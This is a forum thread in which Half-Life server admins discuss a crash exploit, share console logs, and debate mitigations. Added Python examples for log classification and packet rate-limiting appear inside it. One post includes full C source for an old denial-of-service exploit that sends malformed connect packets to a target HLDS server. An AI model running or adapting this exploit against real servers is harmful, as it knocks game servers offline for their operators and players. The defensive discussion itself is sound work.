View Full Version : Steam Only Exploit



pwpx2
27-12-2016, 05:41 PM
I recently started leaving a test server up and allowing all kinds of attacks against it. Many don't get through, but others do.
A few minutes ago I looked in the console and saw something like this.

L 12/27/2016 - 14:52:15: "usFnmcxwEy<12><STEAM_0:1:24174909><>" connected, address "196.65.23.187:56319"
SV_ReadClientMessage: unknown command char (152)
Dropped usFnmcxwEy from server
Reason: Bad command character in client command
Segmentation fault

HLDS is up to date. From what I can tell it's something like fakeplayers, but with a different attack method.

Tiger
27-12-2016, 05:56 PM
I'm aware of the exploit. Unfortunately, without more information about the procedure it performs, I can only create a temporary fix that would stop the bots from connecting to the server - but it would also give a lot of false alarms for real players.

If you have the exploit I could analyze it.

pwpx2
27-12-2016, 06:11 PM
I don't have the exploit, but he sent me a picture.
[link hidden by forum]
He uses FileDeath or something..
He tried several things, and the server withstood all of them except this one.
Before I wasn't using the Shield; now I've put it on and told him to try again so I can see if he still succeeds.
I might try reHLDS to see what the problem is, but some things might stop working for me.

Tiger
27-12-2016, 06:19 PM
At the moment I think antiflood at level 3/4 would block the bot that connects, but it would affect some legitimate players.

I could introduce a new filter as a temporary fix, but there would still be the possibility of banning legitimate players.

Authentication with a SteamID can only happen if he has set up a real Steam account. One possible fix is to ban the SteamID: STEAM_0:1:24174909 .

That Steam account belongs to: [link hidden by forum]

pwpx2
27-12-2016, 06:22 PM
I can also ban his IP in iptables. I was wondering whether there's a real fix. Maybe some maniac with 100 different IPs at the same time will show up and do the same thing.. Hehehe.

Tiger
27-12-2016, 06:56 PM
If the server is SteamOnly, he'll have to authenticate with a real Steam account. By doing that he is already vulnerable, since he can be banned easily. :)

It's worse on nonSteam. I'm looking into the case and trying to find a solution as fast as possible.

raizo11
05-01-2017, 09:26 AM
You don't necessarily have to connect to the server :D

Look at this type of attack

Method 1


Invalid split packet length 4
Invalid split packet length 4
Invalid split packet length 4
Invalid split packet length 4

Method 2


NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2

Method 3


Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)

Method 4


A2A_ACK from 89.248.169.9:27005
A2A_ACK from 213.184.105.111:27005
A2A_ACK from 89.248.169.9:27005
A2A_ACK from 213.184.105.111:27005


--------------- Added after 10 minutes ---------------

This type of exploit can only be stopped in iptables temporarily ... The only solution is ReHLDS... This type of exploit also works on ReHLDS, but it can be blocked with a Metamod plugin

Although the exploit is very old, no way to stop it has been found so far:



#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int startWinsock(void)
{
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2,0),&wsa);
}

int main(int argc, char *argv[])
{
    long rc;
    SOCKET s,s2,s3,s4;
    SOCKADDR_IN addr;
    SOCKADDR_IN remoteAddr;
    char buf[256];
    char challenge[256];
    int remoteAddrLen=sizeof(SOCKADDR_IN);
    char *connect1a;

    /* connectionless "getchallenge" request (0xffffffff out-of-band header first) */
    char get[]="\xff"
    "\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c"
    "\x6c\x65\x6e\x67\x65\x0a\x00";

    /* "connect 46 " prefix: protocol 46; the challenge value is appended at runtime */
    char head[]="\xff"
    "\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74"
    "\x20\x34\x36\x20";

    /* protocol-info and userinfo strings with oversized fields */
    char connect1 []= "\x20"
    "\x22\x5c\x70\x72\x6f\x74"
    "\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c"
    "\x2d\x31\x5c\x72\x61\x77\x5c"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41"
    "\x22" //<---the problem
    "\x22\x20\x22\x5c\x6d\x6f\x64"
    "\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70"
    "\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c"
    "\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f"
    "\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65"
    "\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30"
    "\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61"
    "\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c"
    "\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c"
    "\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64"
    "\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68"
    "\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75"
    "\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e"
    "\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a";

    /* the original called strlen() on these uninitialised buffers; sizeof() is what was meant */
    memset(buf,0,sizeof(buf));
    memset(challenge,0,sizeof(challenge));

    if (argc<3)
    {
        printf("\n%s <Remote host> <Remote port>\n", argv[0]);
        exit(1);
    }
    else
    {
        printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n");
        printf("Found and coded by Delikon | 7.4.03 | [link hidden by forum] | ich@delikon.de \n");
    }

    rc=startWinsock();
    if(rc!=0)
    {
        printf("Error : startWinsock, error code: %ld\n",rc);
        return 1;
    }

    s=socket(AF_INET,SOCK_DGRAM,0);
    if(s==INVALID_SOCKET)
    {
        printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError());
        return 1;
    }

    addr.sin_family=AF_INET;
    addr.sin_addr.s_addr =inet_addr(argv[1]);
    addr.sin_port=htons(atoi(argv[2]));

    /* step 1: request a challenge number from the server */
    rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    if(rc==SOCKET_ERROR)
    {
        printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError());
        return 1;
    }
    rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen);

    /* the challenge value follows a fixed-length reply header; trailing bytes are cut off */
    strcpy(challenge,buf+14);
    challenge[strlen(challenge)-3]='\0';
    printf("Challenge:%s\n",challenge);
    closesocket(s);

    /* step 2: assemble the connect packet: head + challenge + userinfo */
    connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1));
    strcpy(connect1a,head);
    strcat(connect1a,challenge);
    strcat(connect1a,connect1);

    /* step 3: send the same packet three times, 120 ms apart */
    s2=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s2);

    s3=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s3);

    s4=socket(AF_INET,SOCK_DGRAM,0);
    rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    Sleep(120);
    closesocket(s4);

    printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n");

    free(connect1a);
    exit(1);
}
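
The console messages quoted in this thread (the "Bad command character" drop and segfault in the first post, and the four "methods" above) are the only signal a server admin actually has to work with. As an added example, not from the original thread and not from HLDS, ReHLDS or any of the tools mentioned here, the following Python script runs over a constructed console excerpt assembled from those lines, counts each message signature, attributes a bad-command drop to the client that connected immediately before it, and flags sources that repeat A2A_ACK above a threshold. The category names, the threshold and the extra "Player" connect line are my own assumptions.

```python
import re
from collections import Counter

# Constructed sample: the console lines quoted in this thread, plus one
# ordinary connect line (assumed) so the classifier has a benign case.
SAMPLE_CONSOLE = """\
L 12/27/2016 - 14:52:15: "usFnmcxwEy<12><STEAM_0:1:24174909><>" connected, address "196.65.23.187:56319"
SV_ReadClientMessage: unknown command char (152)
Dropped usFnmcxwEy from server
Reason: Bad command character in client command
Segmentation fault
Invalid split packet length 4
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
Malformed packet number (15)
A2A_ACK from 89.248.169.9:27005
A2A_ACK from 213.184.105.111:27005
A2A_ACK from 89.248.169.9:27005
A2A_ACK from 89.248.169.9:27005
L 12/27/2016 - 14:53:01: "Player<13><STEAM_0:0:1><>" connected, address "10.0.0.5:27005"
"""

# Message signatures as they appear in the HLDS console; category names are mine.
SIGNATURES = [
    ("bad_command_char", re.compile(r"SV_ReadClientMessage: unknown command char \((\d+)\)")),
    ("split_bad_length", re.compile(r"Invalid split packet length (\d+)")),
    ("split_duplicate", re.compile(r"NET_GetLong: Ignoring duplicated split packet")),
    ("split_bad_sequence", re.compile(r"Split packet without all \d+ parts")),
    ("malformed_packet_number", re.compile(r"Malformed packet number \((\d+)\)")),
    ("a2a_ack", re.compile(r"A2A_ACK from (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")),
    ("crash", re.compile(r"^Segmentation fault")),
]

# Standard HLDS connect line: "name<userid><steamid><team>" connected, address "ip:port"
CONNECT_RE = re.compile(
    r'"([^"<]+)<\d+><([^>]*)><[^>]*>" connected, address "(\d{1,3}(?:\.\d{1,3}){3}):\d+"'
)


def classify_line(line):
    """Return (category, match) for a known malformed-packet message, else None."""
    for name, rx in SIGNATURES:
        m = rx.search(line)
        if m:
            return name, m
    return None


def analyze(console_text, ack_threshold=3):
    """Summarise one console excerpt: per-signature counts, A2A_ACK flooders,
    the client connected just before each bad-command drop, and whether a crash followed."""
    counts = Counter()
    ack_sources = Counter()
    bad_command_clients = []   # (steamid, ip) connected right before a bad-command drop
    last_connect = None
    crashed = False
    for line in console_text.splitlines():
        cm = CONNECT_RE.search(line)
        if cm:
            last_connect = (cm.group(2), cm.group(3))
            continue
        hit = classify_line(line)
        if not hit:
            continue
        name, m = hit
        counts[name] += 1
        if name == "a2a_ack":
            ack_sources[m.group(1)] += 1
        elif name == "bad_command_char" and last_connect:
            bad_command_clients.append(last_connect)
        elif name == "crash":
            crashed = True
    flooders = {ip: n for ip, n in ack_sources.items() if n >= ack_threshold}
    return {
        "counts": dict(counts),
        "ack_flooders": flooders,
        "bad_command_clients": bad_command_clients,
        "crashed": crashed,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_CONSOLE).items():
        print(f"{key}: {value}")
```

Feed it the server's console log or the output of a log-collecting script; the `bad_command_clients` list is what turns the first post's crash into a SteamID and IP you can act on, and `ack_flooders` separates a source repeating A2A_ACK from a single stray reply.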

Tiger
05-01-2017, 12:33 PM
You're off topic, you picked up an "exploit" from Skillartz by mistake. You don't have the Steam-Only exploit.

Methods 1, 2 and 3 are caused by corrupted packets. The messages come from the NET_QueuePacket and NET_GetLong functions (the latter is also called from NET_QueuePacket).

Method 4 isn't an exploit, it only spams the console - if you connect several times - it causes lag. It can be stopped easily in SV_ConnectionlessPacket.

What you gave me is an old HL Headnut exploit (you can see it still used p46) - an exploit fixed by Valve - it requires connecting - it can be stopped in SV_ConnectClient.

ReHLDS isn't the only solution, you prefer it because it has more bugs you could take advantage of. Everything above can also be fixed with Orpheu or with a Metamod plugin.

As I said, you're off topic.
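
Tiger's point that method 4 can be stopped in SV_ConnectionlessPacket, and his earlier remark that antiflood at level 3/4 also hits legitimate players, come down to one design question: how to rate-limit out-of-band packets per source without rejecting a real client's getchallenge/connect pair. The following Python model is an added example, not Tiger's, raizo11's or any HLDS/ReHLDS/Metamod code; it shows a per-IP sliding-window filter with a separate drop list for packet types the server never needs from a client, run over a constructed traffic trace with one legitimate client and two flooders. The type byte 'j' for A2A_ACK, the thresholds, the hook point and the trace are assumptions, and in a real deployment this logic would live in a Metamod/Orpheu hook in front of the engine function, not in Python.

```python
from collections import Counter, defaultdict, deque

# GoldSrc out-of-band packets start with four 0xff bytes; the next byte (or word)
# identifies the request. 'j' is assumed here to be A2A_ACK, the reply to a ping.
CONNECTIONLESS_HEADER = b"\xff\xff\xff\xff"


class ConnectionlessFilter:
    """Per-source sliding-window limiter for connectionless packets.

    Models the check a hook in front of SV_ConnectionlessPacket could apply
    (assumption: this is not a real HLDS or Metamod API)."""

    def __init__(self, max_packets, window_seconds, drop_types=(b"j",)):
        self.max_packets = max_packets      # budget per source inside the window
        self.window = window_seconds
        self.drop_types = set(drop_types)   # request bytes a client never legitimately sends
        self.history = defaultdict(deque)   # src_ip -> timestamps of accepted packets

    def decide(self, src_ip, payload, now):
        """Return "pass" or a "drop:<reason>" string for one datagram."""
        # 1. In-band (connected-client) traffic is not this filter's business.
        if not payload.startswith(CONNECTIONLESS_HEADER):
            return "pass"
        body = payload[len(CONNECTIONLESS_HEADER):]
        if not body:
            return "drop:empty"
        # 2. Replies to pings this server never sent are dropped outright and do not
        #    even consume the source's budget (method 4 from the thread).
        if body[:1] in self.drop_types:
            return "drop:type"
        # 3. Everything else (getchallenge, connect, queries) is rate-limited per source,
        #    so a real client's two-packet handshake passes while a flood does not.
        q = self.history[src_ip]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_packets:
            return "drop:rate"
        q.append(now)
        return "pass"


def simulate():
    """Run a constructed trace through the filter; returns {ip: {decision: count}}."""
    f = ConnectionlessFilter(max_packets=5, window_seconds=1.0)
    trace = [
        # legitimate client: challenge request, then connect 300 ms later, then in-band data
        ("10.0.0.5", CONNECTIONLESS_HEADER + b"getchallenge\n", 0.00),
        ("10.0.0.5", CONNECTIONLESS_HEADER + b'connect 48 12345 "\\prot\\4" "\\name\\test"\n', 0.30),
        ("10.0.0.5", b"\x00\x00\x00\x01in-band data", 0.50),
    ]
    # flooder A: 20 unsolicited A2A_ACK replies in 200 ms (addresses taken from the thread)
    trace += [("89.248.169.9", CONNECTIONLESS_HEADER + b"j", i * 0.01) for i in range(20)]
    # flooder B: 20 challenge requests in 200 ms, then one more after the window expired
    trace += [("213.184.105.111", CONNECTIONLESS_HEADER + b"getchallenge\n", i * 0.01) for i in range(20)]
    trace.append(("213.184.105.111", CONNECTIONLESS_HEADER + b"getchallenge\n", 2.0))
    trace.sort(key=lambda t: t[2])   # deliver in time order, as the network would

    results = defaultdict(Counter)
    for ip, payload, ts in trace:
        results[ip][f.decide(ip, payload, ts)] += 1
    return {ip: dict(c) for ip, c in results.items()}


if __name__ == "__main__":
    for ip, decisions in simulate().items():
        print(ip, decisions)
```

The budget (5 packets per second per source here) is the knob that antiflood levels abstract over: set it below the number of out-of-band packets a real client sends while joining and you get the false positives Tiger describes, so measure a normal join on your own server before tightening it. Dropping A2A_ACK by type rather than by rate costs nothing for legitimate players, because a client has no reason to send it.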

raizo11
05-01-2017, 02:33 PM
I have the latest dproto and WarGods Shield on the server .... It doesn't matter whether it's Steam only or fake Steam once the exploit doesn't send a bot to the server.. There's nothing to stop from Orpheu, the only solution is an iptables hex string ... you can look here [link hidden by forum]

I just wanted to help but I see you're making fun of me... There's no packet sender by skillardsHd, just as there's no WarGods Anti cheat

There's only the packet sender by kohtep, just as there's the UCP anti cheat

Good Bye